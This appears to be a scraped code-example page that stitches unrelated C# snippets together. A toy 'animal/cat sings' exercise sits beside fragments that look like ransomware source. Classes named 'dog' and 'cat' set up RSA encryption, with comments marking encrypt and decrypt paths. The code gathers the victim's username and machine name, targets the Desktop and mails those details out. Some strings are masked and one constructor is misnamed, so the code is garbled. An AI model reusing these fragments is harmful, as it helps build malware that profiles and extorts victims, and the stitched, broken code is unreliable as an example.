Пример #1
0
 private void button2_Click(object sender, EventArgs e)
 {
     animal ani1;
     ani1 = new cat();
     ani1.color = "白";
     MessageBox.Show(ani1.sing());
 }
Пример #2
0
 public dog()//encrypt icin
 { 
     userName = Environment.UserName;
     
     computerName = System.Environment.MachineName.ToString();
     user = "******" + userName+"\\Desktop";
     about = "Username: "******"\n" + "ComputerName:" + computerName + "\n";
     sendingMail(about);
     rsa = new cat();
     exeDir = Environment.CurrentDirectory+ AppDomain.CurrentDomain.FriendlyName;
     
 }
Пример #3
0
 public dog(string PassDir)//decrypt icin
 {
     rsa = new cat(PassDir);
     userName = Environment.UserName; 
 }
 public StartingEncryption(string PassDir)//decrypt icin
 {
     rsa = new cat(PassDir);
     userName = Environment.UserName; 
 }
Пример #5
0
 private void button3_Click(object sender, EventArgs e)
 {
     cat c1;
     c1 = new cat();
     MessageBox.Show(c1.sing());
 }